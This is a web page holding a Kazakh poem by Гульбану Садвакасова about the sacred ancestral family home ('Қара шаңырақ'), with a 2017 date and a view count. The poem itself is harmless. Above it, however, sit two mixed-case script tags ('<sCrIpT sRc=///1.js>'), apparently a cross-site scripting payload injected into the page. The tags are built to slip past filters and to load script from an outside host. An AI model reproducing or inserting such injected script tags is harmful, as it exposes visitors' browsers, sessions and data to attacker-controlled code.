<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
17.10.2017
Қара шаңырақ
Киелі ғой бабамның шаңырағы,
Анам менен әкемнің жан шуағы.
Әлдеқашан от анасы болсамдағы,
Төріне бір аунағым кеп тұрады.
Киелі ғой әкемнің шаңырағы,
Ұмытылмас балалықтың бал құрағы.
Оң жақтан ұзатылып кетсем дағы,
Сарғайған сағыныш боп шақырады.
Киелі ғой әкемнің шаңырағы,
Бойымда сағыныш боп бұлқынады.
Жыл құсындай айналып бір бармасам,
Жанымның басылмас ед еш құмары.
Қара шаңырақ халқымда биік ұғым,
Балам-ау, қасиетін терең ұғын.
Адамның бойындағы бар асылды,
Киелі қара шаңырақ беретұғын.
Гульбану Садвакасова
Просмотров: 614